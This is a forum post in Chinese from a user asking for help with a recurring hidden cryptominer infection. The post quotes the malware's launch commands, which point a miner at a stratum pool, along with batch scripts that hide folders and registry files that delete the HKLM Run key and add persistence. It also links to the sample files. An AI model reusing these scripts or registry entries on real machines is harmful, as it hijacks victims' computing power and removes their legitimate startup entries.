有關於mix跟init檔案還有spoolv會佔CPU

不知道是惡意軟體還是病毒
有一些檔案會使我的CPU變100%，刪掉它會過一段時間重生（大概過一兩天）

這是一些關聯的檔案
＂
mix
iexplorer.exe
init.exe
geox.exe
hstart.exe
run.bat
bash
libcurl.dll
pthreadGC2.dll
zlib1.dll
spoolv64
spoolv32
＂

就是在C:\Windows\init\spoolv64有個init.exe會讓我電腦CPU變100%
之前刪掉C:\Windows\init這整個資料夾及登錄檔重開機後
沒多久又換成另一個檔案變成iexplorer.exe讓我電腦CPU變100%
資料夾是C:\Windows\mix\spoolv64
一直重複清理都沒有解決問題 ... 一直出現讓我電腦變很Lag
而且資料夾跟檔案全都是隱藏

spoolv64跟spoolv32資料夾中裡面都會有個捷徑叫做bash它的目標

init是以下這個
C:\Windows\init\hstart.exe /NOCONSOLE /SILENT /D="%SystemRoot%\\init\\spoolv64" /HIGH "%SystemRoot%\init\spoolv64\init.exe -o stratum+tcp://cat.or.gs:3333 -O geox.2:x"

mix是以下這個
C:\WINDOWS\mix\hstart.exe /NOCONSOLE /SILENT /D="%SystemRoot%\\mix\\spoolv64" /HIGH "%SystemRoot%\mix\spoolv64\iexplorer.exe -o stratum+tcp://cat.or.gs:3333 -O geox.1:x"

然後bat檔叫做run.bat裡面內容

init是以下這個
@ECHO OFF
START /WAIT /B taskkill /F /IM init.exe > nul
ping -n 3 -w 2 127.0.0.1 > nul
call geox.exe -pula
:end

mix是以下這個
@ECHO OFF
setx GPU_MAX_ALLOC_PERCENT 100
setx GPU_USE_SYNC_OBJECTS 1
START /WAIT /B regedit /s %SystemRoot%\mix\spoolv32\reg.reg
START /WAIT /B %SystemRoot%\mix\spoolv32\bash
START /WAIT /B regedit /s %SystemRoot%\mix\spoolv64\reg.reg
START /WAIT /B %SystemRoot%\mix\spoolv64\bash
START attrib +H +S %SystemRoot%\mix

還有spoolv64跟spoolv32資料夾中裡面都會有個登錄檔叫做reg.reg

init是以下這個
Windows Registry Editor Version 5.00

[-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\svchost\Parameters]

[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\svchost\Parameters]
"Application"="\"C:\\Windows\\init\\spoolv64\\bash.lnk\""
"AppDirectory"="\"C:\\Windows\\init\\spoolv64\\bash.lnk\""

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"spoolv"="\"C:\\Windows\\init\\spoolv64\\bash.lnk\""

mix是以下這個
Windows Registry Editor Version 5.00

[-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\svchost\Parameters]

[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\svchost\Parameters]
"Application"="\"C:\\Windows\\mix\\spoolv64\\bash.lnk\""
"AppDirectory"="\"C:\\Windows\\mix\\spoolv64\\bash.lnk\""

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"spoolv"="\"C:\\Windows\\mix\\spoolv64\\bash.lnk\""

檔案支援（Mediafire空間）
https://www.mediafire.com/?2yf20ycx1ipzgl6


圖片支援